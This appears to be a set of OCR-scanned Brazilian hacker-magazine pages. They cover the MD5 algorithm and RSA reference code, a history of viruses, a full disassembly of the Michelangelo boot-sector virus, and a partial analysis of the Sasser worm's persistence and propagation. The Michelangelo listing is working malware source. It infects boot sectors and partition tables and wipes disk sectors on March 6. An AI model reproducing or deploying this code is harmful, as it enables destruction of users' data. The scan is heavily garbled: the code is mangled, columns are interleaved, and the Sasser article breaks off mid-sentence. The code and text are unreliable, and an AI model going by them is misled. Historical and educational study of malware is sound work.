= 1001 + XLkK] + TED) <<< s). */ /* Let Tabed k s t] deno 
1110 E /* Do the following 16 the operation 
1100 operations. */ a=b+((a+H(b,e,d) 
D O 7 1] [DABC 1 + XEk] + Tl) <<< s). */ 
Então: XY = 1000, not(X) = 0110, [CDAB 2 17 3] [BCDA /* Do the following 
not(X)Z = 0100 , portanto operations. */ 
F(X,Y,2) = 1100 D 4 7 5] [DABC 5 [ABCD 5 433] [DABC 8 
[CDAB 6 17 7] [BCDA 34] [CDAB 11 16 35] [BCDA 
Este passousa umatabela com b4elemen- 8] 423 36 
tos T[1...64], construída a partir da função [ABCD 8 7 [DABC 9 [ABCD 1 437] [DABC 4 
seno Tli] = int(4294967296*sen(i)), | EhF28bTonENo/NERRio) 11]  [BCDA 38] [CDAB 7 16 39]. [BCDA 
1 22 12] 0 23 40] 
aparece em radianos. Depois, aplicamos o [ABCD 12 7 13] [DABC 13 CABCD 13 4 41] [DABC O 
algoritmo >> 5 - o md5 de fato. 2 14] [CDAB 14 17 15] [BCDA 42] [CDAB 3 16 43] [BCDA 
5 22 16 23 44] 
/* neste item a expressão [ABCD 9 4 45] [DABC 12 
MDSDEFATO abed k s i] denota a operação 46] [CDAB 15 16 47] [BCDA 
au DEC ADRs dE 2 23 48] 
/* Process each 16-word blo- XEK] + Til) <<< s (releia o item 
(Eos) sobre Terminologia acima */ /* Round 4. */ 
For i = O to N/16-1 do /* nos blocos a seguir, /* Let [abcd k s t] deno 
procedimentos análogos são re- the operation 
/* Copy block i into X. alizados */ a=b+((a+ I(b,c,d) 
+ XLK] + TE) << s). */ 
For j = 0 to 15 do /* Do the following 
Sit -XEJT to /* Round 2. */ operations. */ 
MLiX16+]. /* Let [abcd k s i] denote [ABCD O 6 49] [DABC 7 
end /* of loop on j */ the operation O 50] [CDAB 14 15 [BCDA 
/* a palavra M[...], a=b+((a+G(b,e,d) 5 21 52] 
obtida no passo dois é carregada + XEk] + TE) <<< s). */ [ABCD 12 6 53] [DABC 3 
emEXE- 54 /* Do the following 16 O 54] [CDAB 10 15 [BCDA 
operations. */ 21 56] 
/* Save A as AA, Bas BB, [ABCD 1 5 17] [DABC 6 & [ABCD 8 6 57] [DABC 15 
Cas CC, and Das DD. */ 9 18] [CDAB 11 14 19] [BCDA O 58] [CDAB 6 3 [BCDA 
* 0 20 20] 3 21 60] 
BB [ABCD 5 5 21] [DABC.10 [ABCD 4 6 61 DABC 11 
Cc 9 22] [CDAB 15 14 23] [BCDA, O 62] [CDAB 2 15 63] [BCDA 
DD 4 20 24] 9 21 64] 
/* aqui o valor dos re- [ABCD 9 5 25] [DABC 14 /* em todos esses items 
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vários cálculos complexos são 
realizados */ 


/* Then perform the 
following additions. (That is 
increment each 

of the four registers 
by the value it had before this 
block 

was started.) */ 

= A+ AA 

= B + BB 
(E am OO 
= EAD 


/* of loop on à */ 


O md (message digest 5) é o valor final 
dos registradores A ,B, Ce D. 

É preciso lembrar que o início da string é 
o byte menos significativo de A e o fim da 
string é o byte mais significativo de D. 

Também vale ressaltar que a construção 
é bem intrincada. Provavelmente, apenas 
os especialistas em criptografia (como o 
criador do md5) saibam com detalhes os 
porquês de cada passo do algoritmo. E 
ainda mais: não encontramos nenhuma 
demonstração matemática a respeito. 

Antes de comentarmos o código que im- 
plementa o md5 (na verdade, parte dele), é 
importante lembrar que existe uma versão 
anterior do algoritmo, o md4, que possui 
diferenças em relação ao md5. 

A seguir, vamos apresentar partes do 
algoritmo do md5. O programa é com- 
posto por três componentes: global.h 
(arquivo de cabeçalho/biblioteca global), 
md5.h (arquivo de biblioteca para o md5) 
e md5.c (o próprio programa do md5). 

A partir de agora, você confere um 
review sobre a origem do aplicativo 
md5sum. Nossa base foi o artigo original, 
sendo que esse review serve apenas para 
estudo e não pode ser compilado. 

Para obter o código completo, acesse 
www.ietf.org/rfc/rfcl32l.txt. 


REndo.n não foi 


AIMPLEMENVAÇÃODOMDS 
OBS: o arquivo de cabeçalho 
incluído, para 
acessar o código completo, acesse 
a referência 1 


/* GLOBAL.H - RSAREF types and 
constants */ 

/* este bloco é apenas um ar- 
quivo de cabeçalho que agrupa 
tipos de dados e constantes */ 


/* PROTOTYPES should be set to 
one if and only if the compiler 
supports 

function argument prototy- 
ping. 

The following makes PROTOTYPES 
default to O if it has not alre- 
ady been defined with C compiler 
flags. */ 


ififndef PROTOTYPES 

ifdefine PROTOTYPES O 

ifendif 

/* diretiva para o pré-pro- 
cessador: a constante simbólica 
PROTOTYPES será feita igual a O 
apenas se não tiver sido previa- 
mente definida - ver referência 
3 página 434 */ 


POINTER defines a generic 
pointer type */ 

f unsigned char *POIN- 
2 defines a two byte 


edef unsigned short int 
25 


UINTA defines a four byte 
E 


f unsigned long “int 


TO LIST is defined de- 
ing on how PROTOTYPES is 
efined above. 

If using PROTOTYPES, then 
ROTO LIST returns the list, 
herwise it 

returns an empty list. */ 
if PROTOTYPES 

j efine PROTO LIST(list) list 
se 

ifdefine PROTO LIST(list) () 
itendif 


A.2 md5.h 


A.3 md5c.c 


/* MD5C.C - RSA Data Security, 
Inc., MD5 message -digest algo- 
rithm */ 
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/* Copyright (C) 1991-2, RSA Data 
Security, Inc. Created 1991. AJ] 
rights reserved. 


Hicense to copy and use this 
software is granted provided 
that it 

is identified as the “RSA Data 
Security, Inc. MD5 Message-Di- 


á' gest 


É 


Algorithm” in all material 
mentioning or referencing this 
software 

or this function. 


License is also granted to make 
aaa use derivative works provi- 
e 

that such works are identified 
as “derived from the RSA Data 

Security, Inc. MD5 Message-Di- 
gest Algorithm” in all material 

mentioning or referencing the 
derived work. 


RSA Data Security, Inc. makes 
no representations concerning 
either 

the merchantability of this sof- 
tware or the suitability of this 

software for any particular-pur- 
pose. It is provided “as is” 


without express or implied war-! 


ranty of any kind. 

These notices must be retained 
in any copies of any part of this 
documentation and/or software. */ 


fFinclude “global.h” 
ifinclude “md5.h” 


/* Constants for MD5 Transform 
routine. */ 


/* programa md5.c */ 


ifinclude “global.h” 
iFinclude “md5.h” 


/* Constants for MD5 Transform 
routine.*/ 


hacke 


am 
rig 


<a, 


PROGRAMAÇÃO 


ZW CE) 


static void MD5Transform PRO- 
TO LIST ((UINTA [4], unsigned 
char [64])); 
static void Encode PROTO LIST 
((unsigned char *, UINTA *, 
unsigned int)); 
static void Decode PROTO. LIST 
((UINTA *, unsigned char *, 
unsigned int)); 
static void MD5 memcpy. PROTO 
LIST (CPOINTER, POINTER, unsigned 
int)); 
static void MD5 memset PRO- 
TO.LIST ((POINTER, int, unsigned 
int)); 


static unsigned char PADDING[64] 


if 
0x80; 0, 0, 0,0, 0,0, 0, 0, 
5 050, DO MOST, BRO, 


0,0, 
He 05 O 
0,.0, 

0, 


0) 
0, 
EO 0:10, 40,=0805 
5105005205 70;207 0. 20570: 
J* bits a serem adicionados (ve 
passo um) */ 


/* E, GQ, Hand I are basic MD 
functions. =/ 

itdefine Flx, .y, 2) (O9) & (9) 
E (0) & (2) 

iidefine G(x, y, 2) ((60) & (2)) 
| Cy) & (-2))) 

fidefine HXx, y 2) (69 * 9) 
er) 

didefine I(x, y, 2) (y) * (O) 
| (=2))) 

/* aqui são definidas as fun- 
ções para processar a mensagem em 
blocos de 16 palavras - ver passo 
quatro */ 


/* ROTATE LEFT rotates x left 
ip) Tofu se dei 

iFdefine ROTATE -LEFT(x, n) (((x) 
<« (n)) | (609) >> (32-(n)))) 

/* realiza o shift cíclico de n 
bits para a esquerda */ 


/* FF, GG, HH, and II transforma- 
tions for rounds 1, 2, 3, and 4. 

Rotation is separate from addi- 
tion to prevent recomputation.*/ 

/* aqui são definidos os pro- 
cedimentos descritos no passo 
quatro */ 


iidefine Fr(a, b, c, d, x, 5, 
ac) LN 

(a) += F (Cb), (e), (d)) + (x) 
+ (UINTA) (ac); N 
E (a) = ROTATE LEFT ((a), (5))) 
a ns (QoDIgo N 


didefine Gala, b, e, 
ac) UN 


(a) += G ((b), (c), (d)) + (x) 
+ (UINTA) (ac); À 
: (a) = ROTATE LEFT ((a), (s)); 
(a) += (b); À 
itdefine HH(a, b, e, d, x, s, 
GRE N 

(a) +=H (Cb), (Cc), (d)) + (9) 
+ (UINTA) (ac); N 
(a) = ROTATE LEFT ((a), (s)); 


(a) sab) 


N 


itdefine Il(a, b, c, d, x, 5, 
ac) AN 
(a) += ((b), (c), (d)) + (x) 
+ (UINTA) (ac); N 
: (a) = ROTATE LEFT ((a), (s)); 


(a) += (b); À 


OBS: as funções a seguir são 
apenas citadas ( sem o código 
fonte) e levemente “modificadas” 
apenas para não interrromper a 
ordem original do programa, na 
referência 1 temos o código 
completo. 


/* Inicialização do MD5. Começa 
com uma operação MD5, escrevendo 
um novo contexto*/ 

void MD5Init (context) 


void MD5Update (context, input, 
inputLen) 


/* MD5 finalization. Ends an 
MD5 message-digest operation, 
writing the 
the message digest and ze- 
roizing the context.  */ 

id MD5Final (digest, con- 


ic void MD5Transform (UNINT 
[4], unsigned char blo- 


MDS basic transformation. 
forms state based on block 


static void Encode (unsigned 
char . *output, UINTA *input 
unsigned int Ten): 

/* Encodes input (UINTA) into 
output (unsigned char). Assume 
ten is a multiple of 4*/ 


static void Decode (UINTA *ou- 
tput , unsigned char *input, 
unsigned int len); 

/* Decodes input (unsigned 
char) into output (UINT4). Assume 
len is a multiple of 4%/ 


static void MD5 memcpy (POINTER 
output, POINTER input, unsigned 


int Ten) 

/* substitui | “for loop” pelo 
neery padrão se for possível 
* 


static void MDS memset (POINTER 
output, int value, unsigned int 
Ten); 

/* substitui “for Toop” pelo 
memset padrão se for possível */ 


int main (int arge, char *argv[ 


AD) 


pe 
int à; 


if (arge > 1) 
for (i = 1; 1 Sarge; i++) 
if (argv[i][0] ==" =" 48 
argv[il[l] == *s”) 
MDString (argv[i] + 2); 
else if (stremp (argv[il, “= 
O) == 0) 
MDTimeTrial O; 
else if (stremp (argv[i], “- 
do) 
MDTestSuite O; - 
else 
MDFile (argv[i]); 
else 
MDFilter O: 


return (0); 


/* Digests a string and prints 
the result. 
SA 


/* Digere uma: string e imprime 
o resultado */ 

Static void MDString (string) 

char *string; 

t 


MD. CTX context; 

unsigned char digest[16]; 

unsigned int len = strlen 
(string); 


MDinit (&context); 

MbUpdate (&context, string, 
ten); 
MDFinal (digest, &context); 


printf (CMDúd (Nus) =, 
MD, string); 

MDPrint (digest): 

printf (nº); 


É 
intais 


if Carge > 1) 
orGI = dE SpaRges tia) 
TRE Cargo == 18& 
argv[iJ(1] == *s”) 
MDString (argv[1] + 2); 
else if (stremp targv[i], “= 


[6 ra OD) 
MDTimeTrial (); 
else if (stremp (argv[il, 
TRAÇO) = (OD) 
MDTestSuite (); 
else 
MDFile (argv[i]); 
else 
MDFilter (O); 


return (0); 


/* Digests a string and prints 
the result. 

s/l 

/* Digere uma string e imprime 
o resultado */ 

static void MDString (string) 

qe *string; 
MD CTX context; 
unsigned char digest[16]; 
unsigned 
(string); 


int len = strien 


MDInit (&context); 

MDUpdate (&context, string, 
ten); 
MDFinal (digest, &context); 


printf (CMD4d (V'ZsV) =“, 
MD, string); 

MDPrint (digest); 

printf (An?) 


/* Measures the time to digest 
LOCK COUNT TEST BLOCK LEN- 


/* Mede o tempo para “digerir” 
os blocos de bytes TEST BLO- 
CK COUNT TEST BLOCK LEN */ 


static void MDTimeTrial (O 


MD CTX context; 

startTime; 

unsigned char block[TEST BLO- 
CK LENJ, digest[16]; 

unsigned int i; 


print 
(“MD%d time trial. Digesting 
wd kd-byte blocks ...”, MD, 
TEST BLOCK LEN, TEST BLO- 
CK COUNT); 


/* Initialize block */ 

for (ii ='0; j < TEST BLO- 
CK LEN; ++) 

block[i] = (unsigned char)(i 
& Oxff); 


/* Start timer */ 
time (&startTime); 


/* Digest blocks */ 
MDInit (&context); 


for (1 =05 01 
CK COUNT; i++) 
MDUpdate 


< TEST BLO- 


(&context, block, 


AQTEST BLOCK LEN); 
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MDFinal (digest, &context); 


/* Stop timer */ 
time (&endTime); 


printf (“ donein”): 

printf (“Digest = “); 

MDPrint (digest); 

printf (“AnTime = %ld secondsN 
(Tong) (endTime-startTime)); 


printf 
%Wld byte s/secondN 


(“Speed = 
(Tong)TEST BLOCK LEN * 
(long)TEST BLOCK COUNT/(endTime- 
tartTime)); 
; 


n 
n 
s 


/* Digests a reference suite o 
strings and prints the results. 
* 


/* “Digere um grupo de string 
de referência e imprime os resul 
tados */ 


static void MDTestSuite () 
printf (“MDZd test suite:An” 


MDString (“”); 
MDString (“a”); 
MDString (“abc”): 
MDString (“message digest”); 
MDString (“abedefghijkImnopgrs- 
tuvwxyz”); 
MDString 
(*ABCDEFGHIJKLMNOPORSTU- 
VWXYZabcdefghijkImnopgrstu- 
VwxyZ0123456789"); 
MDString 
(“12345678901234567890123456789 
01234567890N 
1234567890123456789012345678901 
234567890”); 
) 


/* Digests a file and prints the 
result. */ 

/* Calcula o MD5 de um arquivo e 
imprime o resultado */ 


static void MDFile (filename) 
char *filename; 


FILE *file; 

MD CTX context; 

int Ten; 

unsigned char buffer[1024], 
digest[16]; 


if ((file = fopen (filename 


à “rb”)) == NULL) 


y 


printf (“%s can't be openedin” 
filename); 


else ( 


MDInit (&context); 
while (Ten = fread (buffer 1 
1024, file)) 
MbUpdate (&context, bufi 
Ten); 
MDFinal (digest, &context); 


fclose (file); 


printf (“MD4d (4s) = * 
filename); 

MDPrint (digest): 

Era (No) 


) 


/* Calcula o MD5 a partir da 
entrada padrão e imprime o re- 
sultado*/ 

e void MDFilter () 

MD CTX context; 

int Ten; 
unsigned char buffer[16], 
digest[16]; 


MDInit (&context); 

while (len = fread (buffer, 1, 
6, stdin)) É 

MbUpdate (&context, buffer, 
en); 


DFinal ( digest, &context): 


MDPrint (digest); 
printf (“n?); 
) 


/* Imprime o. MD5 em hexadeci- 
mal */ 

static void MDPrint (digest) 

ge char digest [16]; 


unsigned int i; 

for (1 = 0; à < 16; i++) 
printf (“%02x”, digesthil); 
) 
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m primeiro lugar, o que é um vírus ? De acordo com 
as referências clássicas, “trata-se de um programa ou 


fragmento de código que invade seu computador e roda , 


sem sua autorização”. Tal explicação pode ser correta, 
mas está longe de dar conta do peso que os vírus têm na 
cultura e no universo da informática. A quantidade - e variedade — de 
vírus que circulam pela internet é tão grande que há quem brinque 
dizendo que eles até já fazem parte do protocolo da rede. | 
Não há um consenso sobre a origem dos vírus, mas as primeiras 
dessas criaturas, os vírus Pervading Animal e Christmas tree, teriam 
surgido no final dos anos 70 e infectaram computadores como o 
Univac 108 e IMB 360/370. O Pervading Animal já tinha uma carac- 
terística comum aos vírus modernos: fundia-se no final de arquivos 
executáveis. Já em meados dos anos 80, novos atores tomaram 
o palco, como os vírus Brain e Vienna. Para os padrões de hoje, a 
ação do Brain era muito simples. O vírus infectava disquetes de 360 
kb, utilizando técnicas de camuflagem - em inglês, stealth. Quando 
se tentava ler o setor infectado, o “Brain” movia-se, restaurando o 
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setor original. Desse modo, o vírus conseguiu uma expansão razo- 
ável e causou estrago, já que a comunidade digital ainda não estava 
preparada para lidar com o ataque de um vírus na prática. 

As leis ainda ignoravam a situação, e os criadores, dois paquis- 

taneses, chegaram a incluir no código fonte do vírus seus nomes, 
endereços e até o número de telefone, algo inimaginável hoje. 
Já pensou se os criadores do Sasser, Blaster e cia resolvessem copiar 
esses pioneiros? Outro vírus que marcou a década de 1980 foi o 
Morris, também conhecido como Internet worm, que infectou mais 
de 6000 computadores nos EUA, provocando prejuízos estimados 
em US$ 96 milhões. 


ATAQUE POLIMÓRFICO 


No início dos anos de 1990, os vírus incorporaram uma novidade: u 


polimorfismo, que estreou com o vírus Tequila. Um vírus polimórfico. 


usa encriptação/decriptação em si mesmo, e essa capacidade pode | 
ser aplicada em arquivos infectados distintos. Issotransformaesses 
virus em mutantes, que conseguem modificar a si próprios a cada 
infecção, dificultando sua identificação. Os vírus polimórficos se 
popularizaram com a criação de ferramentas geradoras de vírus, que + 
criavam um módulo virótico convencional e um móduilo polimórfico : 
(um arquivo obj). Depois, os arquivos eram linkados, gerando o vírus | 
polimórfico desejado. 

Com o refinamento do polimorfismo, as técnicas de camuflagem 


deram um salto, dificultando cada vez mais a identificação dos 
arquivos infectados. Uma dor de cabeça e tanto para a segurança, ! 


pl 


já que estes vírus requeriam métodos especiais de detecção, como 
[ emulação da execução do vírus, algoritmos de restauração de partes 
do código do vírus, entre outros. A galeria de vírus polimórficos que 
ficaram famosos é grande, com nomes como Bootache, CivilWar, 
Crusher, Dudley, Fly, Freddy, Ginger, Grog, Haifa, Moctezuma, MVE, 
Necros, Nukehard, Predator, Satanbug, Sandra e outros. 


E WINDOWS 95: AS PORTAS SÃO ESCANCARADAS 
Em 1995, a Microsoft lançou com estardalhaço o Windows 95. 
Telejornais de todo o mundo acompanhavam o frissom dos 
| consumidóres, que como fanáticos, se aglutinavam nas portas 
das lojas, esperando pacientemente para comprar uma cópia 
da inovação. Mal sabiam as portas para um “mundo novo” de 
*" infestação estava para se abrir... 
k Coma rápida popularização do sistema operacional da Microsoft, 
* — novos vírus com propriedades adequados a infestar o Windows 95 
surgiram. Agora, os vírus podiam se anexar a arquivos da suíte offi- 
ce.Eram os chamados vírus de macro, que contaminam arquivos do 
Word e Excel. Como na mesma época o mundo assistia a explosão da 
internet, a constante troca de arquivos do Office infectados na rede 
provocou uma verdadeira epidemia virótica. Vírus como o Concept, 
de 1995, eoLaroux, de 1996, foram devastadores, elevandia escala 
de máquinas infectadas para o patamar dos milhões. Novamente 
a comunidade digital, representada no caso pelas então nascentes 
ampresas de anti-vírus, foi pega de surpresa pelos métodos inova- 
dores criados pelos desenvolvedores de vírus. Para combater os 
vírus de macro, os anti-vírus copiaram os métodos de infecção: os 
documentos eram igualmente “contaminados”, mas em vez de se 
propagar, apenas eliminavam o vírus do documento. 


E A SAGA CONTINUA 


No final da década de 1990, uma nova e devastadora onda 
de infecções com o Melissa - na verdade um worm , Corner, 
Tristate e o Bubbleboy - também um worm . O Melissa, que 
causou um prejuízo global estimado em US$ 80 milhões, usava 
o db de endereços do Outlook Express para enviar cópias de si 
mesmo para outros usuários via e-mail. Já o Bubbleboy usava o 
runtime do Outlook Express para ser ativado. Não era necessário 
abrir nenhum arquivo anexo para ser infectado. Bastava abrir a 
mensagem para o vírus ser ativado. 

No início do novo milênio surgiram os primeiros vírus 
cross- plataform, e para Linux, como o Winux - junção de, 
adivinhem, Windows/Linux - uma tentativa de criar um vírus 
que pudesse infectar ambos os sistemas ao mesmo tempo, 
mas que se mostrou ineficiente e cheio bugs. 


O Linux constituiu um capítulo à parte na história. A Í 
criação de vírus que possam atacar eficientemente o Linux 
ainda é um desafio. Apesar de existirem diversos vírus para 
o sistema do pingúim, o fato de não existir um Linux, mas 
sim várias distribuições personalizadas, acaba evitando , 
grandes infecções, já que não existem padrões globais co- | 
nhecidos para serem explorados, como é inevitável em um : 
sistema operacional como o Windows. : 

Em setembro de 2001, foi a vez do worm Ninda mostrar ". 
seus poderes. Finalmente, no biênio 2003/2004 temos novas | 4 
fornadas de vírus e worms com alto poder de disseminação, ), 
como o worm Sobig, que possuía seu proprio programa de 
SMTP e usava redes de sharing Windows para se espalhar. No ' 
mesmo ano o worm slammer chegou a tirar temporariamente | 
toda a Coréia do Sul da internet explorando vulnerabilidades 
em servidores MS SQL 2000. 

Não poderíamos deixar de citar, é claro, o worm Blaster, 
que explorava uma falha de vulnerabilidade RPC. Bastava 
estar conectado à web para o micro ser infectado. 

E em 2004, o worm Sasser vem se destacando. Utilizando 
o exploit LSASS lançado por “houseofdabus”, quando exe- 
cutado o Sasser: BEN 


j 


e Se instala em Y%WINDIR% como avserve.exe 


e Adiciona a seguinte chave de registro: 


HKLMNSoftwarelMicrosoftiWindowsiCurrentVer- 
sionkRun 
avserve.exe -> C:N4WINDIRZNavserve.exe 


e Cria um Mutex ( “Jobaka31”) para garantir que apenas uma 1 
cópia do worm rode na memória É 


e Cria um mini servidor de FTP na porta 5554 de TCP para se 
auto enviar para outros sistemas explorados pelo LSASS 


e Cria 28 sub-processos para scannear e explorar sistemas vulneráveis 


e Chama o método de AP| AbortSystemShutdown para prevenir 
o reboot do sistema 


e Aguarda por 3 segundos e então torna a chamar a API 
AbortSystemShutdown 


Esses ítens já demonstram a ação devastadora do Sasser... 
com isso encerramos nosso breve resumo histórico sobre vírus. 


Uma leitura fundamental é apo a na referência 2, a seguir 


— 
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; This is a disassembly of the 
much-hyped michelangelo virus. 
; Às you can see, it is a deriva- 
tive of the Stoned virus. The 
junk bytes at the end of the file 
are probably throwbacks to 

The Stoned virus. in any 
case, it is yet another boot 
sector 
; and partition table infector. 


michelangelo segment byte 
public 

assume cs:michelangelo, ds: 
michelangelo 


; Disassembly by Dark Angel of 
PHALCON/SKISM 


org 0 

imp entervirus 
highmemjmp db 0F5h, 
00h. 80h. 9Fh 

maxhead db 

; Usado por dps NAO 
firstsector dw 
oldinti3h 

0C8000256h 

intl3h;: 

push ds 

push ax 

or didi 

drive padrão ? 

jnz exitinti3h 

sair no caso negativo 

xor ax, ax 

mov ds, ax 

EC byte ptr ds:[43Fh], 
;-disco O ligado ? 

jnz exitinti3h 

se não está rodando, sair 
pop ax 

pop ds 

pushf 

call dword ptr cs:[oldinti3h]; 
primeira. chamada para o int 
13h 

pushf 

call infectdisk 

então infect 

popf 

Ret 2 
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exitinti3h: pop 

pop ds 

imp dword ptr 
cs: [oldinti3h] 

infectdisk: 

pus ax 

push bx 

push Cx 

pus dx 

push ds 

pus es 

pus si 

push di 

push cs 

pop ds 

pus cs 

pop es 

mov si, 4 

readbootblock: 

mov ax,20lh E 
leia setor de boot 

mov bx,200h 

depois o vírus 

mov. cx,1 

xor dx,dx 

pushf 

call oldinti3h 

jne checkinfect E 
continue no caso de erro 

xor ax,ax 

» pushf 

call oldinti3h ç 
resete o disco 

dec si 

loop back 

jnz readbootblock 

imp short quitinfect E 
saia no caso de muitas falhas 
checkinfect: 

xor si,si 

eld 

Todsw 

emp ax, [bx] 

teste se já está infectado 
jne infectitnow 

Todsw 

emp ax, [bx+2] 2 
teste novamente 

je quitinfect 
infectitnow: 

mov ax,301h 

escreva bloco de boot velho 
mov dh,1 


para cabeça 1 


mov e153 ; 


setor 3 

cmp byte ptr [bx+15h],0FDh 
; disco de 360k ? 

je is360Kdisk 

mov c1,0Eh 

is360Kdisk: 

mov. firstsector,cx 

pushf 

tall otdintish 

jc quitinfect 


sair no caso de erro exit on 
ET ATOD: 


mov si,200h+offset parti- 
tioninfo 

mov di,offset partitionin- 
fo 

mov. cx,2lh E 
copia a tabela de partição 

cld 

rep movsw 

mov ax.301h 

escreve o virus no setor 1 
xor bx, bx 

mov. cx,1 

xor dx,dx 

pushf 

call oldinti3h 

quitinfect: 

pop di 

pop si 

pop es 

pop ds 

pop dx 

pop EX 

pop bx 

pop ax 

retn 

entervirus: - 
xor ax,ax 

mov ds,ax 

cli 

mov Ss,ax 

mov. ax,7C00h 

seta a pilha 

mov sp,ax 5 
ponto de carga do vírus 

sti 

push ds 


salva 0:7C00h na pilha para 
push ax 

retificação posterior 

mov ax,ds:[13h*4] 

mov. word ptr ds: [7C00h+offset 


oldinti3h],ax 

mov. ax,ds:[13h*4+2] 
mov word ptr ds: [7C00h+offset 
oldinti3h+2],ax 


mov ax,ds:[413h] á 
tanho da memória em kb 

dec ax E 
1024 kb 

dec ax 

mov ds:[413h],ax : 
move valor novo em 

mov cl,6 

shi ax,e]l s 
ax.= parágrafos de memória 
mov es,ax ; 


next line sets seg of jmp 
mov word ptr ds:[7C00h+2+offset 
highmemjmp7,ax 


mov ax,offset intl3h 

mov. ds:[13h*4],ax 

mov ds: [13h*4+2],es 

mov cx,offset partitio- 
ninfo 

mov: si,7C00h 

xor di,di 

cld 

rep movsb ; 


copia para a memória alta 

e transfere o controle para lá 
imp dword ptr cs: [7C00h+offset 
highmemjmpl 


; destino do highmem jmp 


xor ax, ax 
mov es,ax 

int 13h 

reseta o disco 

push es 

pop ds 

mov ax,201h 

mov. bx,7C00h 

mov: cx,firstsector 

emp CxE É 
o hd está infectado ? 

jne floppyboot aj 
no caso negativo, iinfecte os 
disquetes ; 

mov dx,80h A 
lê a tabela de partição antiga 
int 13h & 


do primeiro hd em 0:7C00h 


imp short exitvirus 
floppyboot: 
Mov cx,firstsector : 


lê o setor de boot antigo 


mov dx,100h 


para. 0:7C00h 
int 13h 
je exitvirus 
push ES 
pop es 
mov ax,201h 
lê o setor de boot 
| mov. bx,200h E 
do primeiro hd 
mov cx,1 
mov dx,80h 
in 13h 
je exitvirus 
xor si,si 
cld 
Todsw 
emp ax, [bx] a 
está infectado ? 
jne infectharddisk ê 
no caso negativo, infecte o HD 
Todsw 5 
checa a infecção 
cmp ax, [bx+2] 
jne infectharddisk 
exitvirus: 
xor Cx,Cx 
captura a data corrente 
mov ah,4 5 
dx = mon/day 
in 1Ah 
emp dx,306h E 
6 de Março 
je damagestuff 
Reset 


devolve o controle para o original 


: bloco de boot € 0:7C00h 


damagestuff: 

xor dx,dx 

mov [e ce 
smashanothersector 
mov ax,309h 

mov si,firstsector 
emp ST,9. 

je smashit 

mov al,0Eh 

emp) si,0Eh 

Je, smashit 

mov d1,80h s 
primeiro disco rígido 
mov. maxhead,4 

mov al,11lh 
smashit: 


mov bx,5000h 


área de memória aleatória 
mov es,bx 
em 5000h:5000h 
int 13h 5 
escreve todos os setores para cm 
o drive dl 
jnc skiponerror ; 
descarta no caso de erro 
xor ah,ah 3 
reseta o drive de disco dl 
int 13h 

| skiponerror: 
inc dh 8 
próxima cabeça 
cmp dh,maxhead E 
2 no caso de floppy, 4 no do HD 
ib smashanothersector 
xor dh,dh ; Vá 


para a próxima cabeça/cilindro 
inc ch 


imp short smashanothersector 
infectharddisk: 
mov Cx,7 5 


Escreva a tabela de Write par- 
tition table to 


mov firstsector,cx 5 
setor 7 

mov. ax,301h 

mov dx,80h 

int 13h 

je exitvirus 

mov si,200h+offset partitio- 
ninfo ; copiar a partição 

mov di offset partitioninfo 
; informação da tabela 

mov ex,2lh 

rep Movsw 

mov ax,301h B 
escreve no setor 8 

xor bx, bx Ê 


copia o vírus para o setor 1 
inc cl 


in 13h 
Fa imp short 
01E0h 

OREIBER E deh 


db 


Este deve travar ? 

; Os seguintes bytes são inúteis 

garbage fofo) 1,4,11h, 
0,80h,0,5,5,32h,1,0,0,0,0,0,53h 


partitioninfo: db 42h 
dup. (0) 

michelangelo ends 

end 
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DA PRAGA DO 
MOMENTO 


uem teve a oportunidade de ler o artigo “Ameaças 

Virtuais”, publicado no último número da revista 

HSCKSR [edição 15), que tratava das característi- 

cas dos vírus que estão por vir, já estava prepara- 

do para compreender as características do worm 
que causolfrandes estragos nos últimos meses. 

Oartigo reforçava a tese de que tais ameaças estão se tornan- 
do mais fortes do que nunca, mesmo com todos os esforços de 
segurança. Novos bugs são encontrados e novos códigos cada 
vez mais eficientes são criados para explorá-los. 

E não estamos falando de grande complexidade técnica. Um 
simples código aparentemente inofensivo pode virar uma po- 
derosa ferramenta de exploração, como é o caso de um exploit 
básico, que pode ser aplicado em um código malicioso qualquer. 
E esse é justamente o exemplo do worm do momento, o Sasser, 
que discutiremos nesse artigo. 


O PREÇO DO DESCASO 


O worm Sasser tem praticamente as mesmas características de 
outros worms gue fizeram história, como o Blaster e o Mydoom. 
A diferença entre eles é a falha utilizada para explorar o sistema 
atacado e se espalhar por máquinas do mundo inteiro. 

O Sasser se propaga verificando endereços IP selecionados 
aleatoriamente de sistemas vulneráveis. É simples: quem ainda 
não instalou os patches distribuídos pela Microsoft para resolver 
o bug explorado pelo worm, provavelmente será infectado. 


Mais de 90% dos usuários domésticos não têm interesse ou 
sequer sabem que seu sistema Microsoft Windows apresenta 
diversas falhas que podem ser utilizadas por vírus e worms, mas 
que são facilmente corrigidas com a instalação de patches, Esse é 
ocaso dos service packs, que são atualizações críticas do sistema | 
distribuídas pela Microsoft de graça. O resultado do descaso? 
Milhares de máquinas sendo infectadas à cada minuto no mundo: 
inteiro, prejuízo que poderia ser evitado ou levado mais a sério 
por parte de qualquer usuário. Afinal, para ter um sistema Pesaro; 
não basta apenas instalar um antivírus. 


A IDENTIDADE DO SASSER 


O Sasser pode ser executado, mas não pode infectar computa- . 
dores baseados nos Windows 95/98/Me. Embora esses sisternas 


“operacionais não sejam contaminados, eles podem ser usados para 


infectar sistemas vulneráveis aos quais eles tenham contado. 
Neste caso, o wormirá consumir muitos recursos, fazendo com 


que os programas não possam ser executados corretamente, 
incluindo a ferramenta específica para a remoção do worm, 
que está disponível em diversos sites de antivírus. 

Assim que o arquivo infectado com o worm é carregado em 
seu sistema, o Sasser executa as seguintes ações: 


— Tenta criar um mutex chamado Jobaka3I que é finalizado, 
o a tentativa falhe. Isso assegura que não seja executada mais 
instância do worm em uma mesma máquina ao mesmo 
lo assim travar o arquivo ou a conexão local 


mo como “oWindirolavserve.exe. 
%Windir% é uma vari localiza a pasta de instalação 


u CAWinnt) e cria uma 


do Windows (por padrão, 
cópia de si mesmo para esse local. 


- À seguir, é adicionado o valor: “avserve. 
exe"="YoWindir%olavserve.exe” à chave de registr 
HKEY LOCAL MACHINEISOFTWARENMicrosoftiWin- 
dowslCurrentVersionlRun, para que o worm seja execu- 
tado sempre que o Windows for iniciado. 


— Utiliza a API AbortSystemShutdown para atrapalhar as 
tentativas de desligar ou reiniciar o computador. 


- Inicia um servidor FTP na porta TCP 5554, Este servidor é 
usado para disseminar o worm para outros servidores. 


= Percorre todos os endereços IP dos hosts, procurando por 
aqueles que não possuam qualquer uma dessas segjiências: 


| 127.0.0.1 
10.x.x.x 
172.16.x.x - 172.31.x.x (inclusive) 
192.168.x.x 
169.254.x.x 


Usando um desses ender 

IP aleatório: 
Em 52% d 
atório. 


